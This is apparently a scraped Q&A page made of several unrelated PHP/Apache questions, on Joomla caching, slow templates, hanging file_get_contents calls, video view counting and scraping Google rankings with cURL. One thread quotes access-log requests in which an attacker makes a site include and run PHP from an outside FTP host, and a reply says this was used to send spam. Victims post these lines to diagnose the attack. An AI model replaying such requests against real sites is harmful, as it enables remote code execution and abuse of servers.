We're having strange behavior on our linux server. Here are some symptoms:
1) PHP using old information when processing scripts:
For example: I loaded up the site today and it ran the mobile version of our Joomla 2.5.9 template instead of the normal template. I looked through the access log and two minutes before I loaded the site up an iPhone had accessed the site. So, for some reason the PHP code ‘thought’ that my access was still the iPhone. Here’s a snip from the access log.
74.45.141.88 - - [01/Mar/2013:07:39:24 -0800] "GET / HTTP/1.1" 200 9771 "https://m.facebook.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B141 [FBAN/FBIOS;FBAV/5.5;FBBV/123337;FBDV/iPhone2,1;FBMD/iPhone;FBSN/iPhone OS;FBSV/6.1;FBSS/1; FBCR/AT&T;FBID/phone;FBLC/en_US;FBOP/0]"
...
63.224.42.234 - - [01/Mar/2013:07:43:45 -0800] "GET / HTTP/1.1" 200 9771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
2) Links on the site are sometimes being generated within Joomla differently: sometimes "ww.sitename.com" or just "sitename.com" when it should be "www.sitename.com".
3) When I make a configuration change to the site (within Joomla administration), it doesn't always take immediately, though it should. For instance, when click publish something using the user interface, it will still be published for quite a while after I unpublished it. During a problem like this, I have tried restarting both Apache and MySQL and it didn't help. I had to wait until something updated. Eventually it does update.
4) The php session doesn't consistently work. We have code that generates a captcha from a session variable. The code fails sometimes rendering the captcha inoperable.
All the above is totally inconsistent. Sometimes it wigs out other times it doesn't. Also, note that the site works totally fine on our dev.sitename.com. We even tried to switch the Apache webserver configuration from our dev.sitename.com to our sitename.com. And the problem still persists.
Thank you.
I had a similar problems with magento CMS in my case the problem was cache used by magento. Disabling the caching functionality had solved the problem.
Related
I have a persistent problem on one of my Joomla 3.03 websites. The script always delays for about 31 seconds between "afterDispatch" and "beforeRenderModule" before the first module that is in the renderlist.
Other websites on my server run fine
The issue is not module related...unpublishing the first module just shifts the issue to the next module in the list.
The issue seems to be template specific, replacing the template index.php with a standard "Hello world" index.php brings the page up immediately, as does switching to another template.
Deactivating js in chrome devtools does not affect the load time, still slow (I also selectively deleted all the script links that were called in the template index.php to no effect).
I am at a loss as to what is causing the issue. I tried php debugging by inserting a php function
function debug_to_console($data) {
$output = $data;
if (is_array($output))
$output = implode(',', $output);
$date = date('m/d/Y h:i:s a', time());
echo "<script>console.log('Debug Objects: " . $output . $date"' );</script>"; }
at the head of the file and inserting
debug_to_console("Introduced break point:");
at break points, but merely inserting the function without the subsequent break points causes the browser to only display "Break point" and nothing else in the browser window (not the console) immediately. this is making it hard to debug the script.
Any ideas? The website used to run fine. I am loathe to updating PHP because that might affect my other websites which all work fine.
Here is some system info:
PHP Built On Linux inbound-smtp.eu-west-1.amazonaws.com. X.X.XX-XX.XX.amzn1.x86_64 #1 SMP Fri Dec 30 19:11:28 UTC 2016 x86_64
Database Version 5.5.52 Database Collation utf8_general_ci
PHP Version 5.6.28
Web Server Apache/2.4.23 (Amazon) OpenSSL/1.0.1k-fips PHP/5.6.28
WebServer to PHP Interface apache2handler
Joomla! Version Joomla! 3.0.3 Stable [ Ember ] 04-February-2013 14:00 GMT
Joomla! Platform Version Joomla Platform 12.2.0 Stable [ Neil Armstrong ] 21-September-2012 00:00 GMT
User Agent Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
(i changed some numbers to Xs in the first line).
I have a few servers that fetch images from other sites.
After working for months. Apache started crashing every few hours. (see config at the bottom of the post)
Investigation using logging in the code, shows that sometimes file_get_contents hangs keeping the apache process in W state forever. Sample URL of fetched file that hanged: https://www.mxstore.com.au/assets/thumb/3104041-c.jpg
I have set timeouts in 3 locations and still the Apache process hangs forever
set_time_limit (10);
ini_set('default_socket_timeout',10);
And also in the context (see timeout=>3) :
$opts = array( 'http'=>array('header'=>" User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" ,'timeout'=>3 ) );
$context = stream_context_create($opts);
$data= file_get_contents($product[p_img], false, $context,-1,1500000);
How can I either make timeout work and/or understand why the image is not fetched?
Config:
PHP Version 5.5.9-1ubuntu4.19
Apache/2.4.7 (Ubuntu)
Apache API Version 20120211
Unfortunately all my searches didnt yield a solution. I implemented Curl for the calls.
I'm facing a big problem and I can't find the cause. I have a website running in apache in port 80 with ftp access.
Some user is creating FTP folders with malicious commands. I analysed the apache log and found the following strange lines:
[08/Jul/2016:22:54:09 -0300] "POST /index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&action=upload&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/ HTTP/1.1" 200 18391 "http://mywebsite/index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
In my FTP the following folder was created: /public_html/Cliente
I have a piece in my code that uses $_GET['pg'], see:
$pg = isset($_GET['pg']) ? $_GET['pg'] : null;
$pg = htmlspecialchars($pg, ENT_QUOTES);
I tried test the command "pg=ftp://zkeliai..." like hacker did, but nothing happens, and I expected this. I'm very confused in how hacker the created a folder in my FTP.
Without knowing what $pg is being used for, it's not really possible to get what the hacker is doing, but it looks like he send a POST request to index.php with the parameters
?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/
The effect of your sanitation with htmlspecialchars is to convert the one & in the string to &. When the request is processed by index.php, but, it will be converted back to & in an internal string as PHP will assume it was just URL encoded, so when index.php is sending its server-side request to Thumbr.php, the & is present and serves to send parameters to the FTP.
We had a similar issue on our university's site. We have over 2200 hits the last few days from this IP with two different .php pages: showcase.php and Thumbr.php
Here's a snippet from our log
POST /navigator/index.php page=ftp://zkeliai:zkeliai#zkeliai.lt/zkeliai/showcase.php? 80 - 177.125.20.3 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0 11154
This page was used to send spam through our SMTP server. The page= GET parameter in the URL was being loaded by our PHP page with no filtering on the value. The showcase.php page (no longer on the FTP site) was a simple HTML form with a field for a subject, a field for HTML body contents, and a text area for email recipients.
Without being sure what was posted, it seems loading the ftp page (with the included credentials) into PHP with the $_GET[] managed to execute the content on that page? I'm unclear as to how that may work, but that seems to be what happened.
I have JWplayer installed on my website and would like to record and store the number of views my videos get.
I already have all the javascript and ajax code needed to store data into my database after someone hits play. However I feel that incrementing a number in the database every single time someone plays a video is inefficient.
What would be the best most efficient method to solve this problem?
Thanks.
I asked a similar question several months ago, but it related to ads. I wanted to know the best way to track ad renders so I could bill clients accurately. The response I got was to use access logs. So I ended up writing a parser to extrapolate out all the ads from a server log and import into a table for report viewing.
Something to look out for if you are going to use access logs as the source for tracking this type of information. Logrotate, make sure you are pulling the data out before logrotate overwrites a logfile. I'm not really a systems guy, but I set my logrotate up so that every day at midnight the days log file gets moved to a new location.
Another benefit of access logs is if a client (or anyone) questions your numbers you can refer back to the source log file and demonstrate that your numbers are not inflated.
-- Edit --
Example of access log entry:
# If you can extrapolate videos from your path, then your parser has something to
# hook into (videos in path), and your done
127.0.0.1 - - [08/Dec/2011:22:47:25 +0000] "GET /path/to/your/videos/video1.wmv HTTP/1.0" 200 57530 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2"
# Or, you could append a flag to the video url, and have your parser hook into the flag
# for this example 'videoPlayed'
127.0.0.1 - - [08/Dec/2011:22:47:25 +0000] "GET /path/to/your/videos/video1.wmv?videoPlayed=1 HTTP/1.0" 200 57530 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2"
I have written a PHP script based on a piece of code I've found using Google. It's purpose is to check particular site's position in Google, given a particular keyword. Firstly, it prepares an appropriate URL to query Google (something like: "http://www.google.com/search?q=the+keyword&ie=utf-8&oe=utf-8&num=50"), then it downloads the source of a site located at the URL prepared before. After that, it counts the position using regular expressions and the knowledge about what div's classes does Google use for results.
The script works fine when the URL I want to download from is in the domain "google.com". But since I it's intended to check position for polish people, I would like it to use "google.pl". I wouldn't care, but the search results can really vary between the two (even more than 100 positions of difference). Unfortunately, when I try to use the "pl" domain, the cURL just doesnt't return anything (it waits for the timeout first). However, when I ran my script on another server, it worked perfectly on both of "google.com" and "google.pl" domains. Do you have an idea why can something like this happen? Is there a possibility that my server was banned from querying the "google.pl" domain?
Here, my cURL code:
private function cURL($url)
{
$ch = curl_init($url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5);
return curl_exec($ch);
curl_close($ch);
}
First of all, I cannot reproduce your problem. I used the following 3 cURL commands to simulate your situation:
curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.51.5 (KHTML, like Gecko) Version/5.1 Safari/534.51.3" http://www.google.com/search?q=the+keyword
curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.51.5 (KHTML, like Gecko) Version/5.1 Safari/534.51.3" http://www.google.pl/search?q=the+keyword
curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.51.5 (KHTML, like Gecko) Version/5.1 Safari/534.51.3" http://www.google.nl/search?q=the+keyword
The first one is .com, because this should work as your reference point. Positive.
The second one is .pl, because this is where you are encountering problems with. This also just works for me.
The third one is .nl, because this is where I live (so basically what's .pl for you). This too just works for me.
I'm not sure, but this could be one possible explanation:
Google.com is international, when I enter something at google.nl for example, I still go to google.com/search?q=... (the only difference is the additional lang-param).
Since google.nl/search?q=... redirects to google.com (302). Its actual body is empty.
I don't know, but it is possible cURL isn't able to handle redirects, or you need to set an additional flag.
If this is true (which I'll check now), you need to use google.com as domain and add an additional lang-param, instead of using google.pl.
The reason your other server does the trick, can be because cURL's configuration varies, or the cURL version isn't the same.
Also, it's blocking cURL's default user-agent string, so I'ld also suggest you to change it into something like:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.51.5 (KHTML, like Gecko) Version/5.1 Safari/534.51.3
This has nothing to do with the problems you're encountering, but you don't actually close your cURL socket, since you return before you close it (everything after return ... will be 'skipped').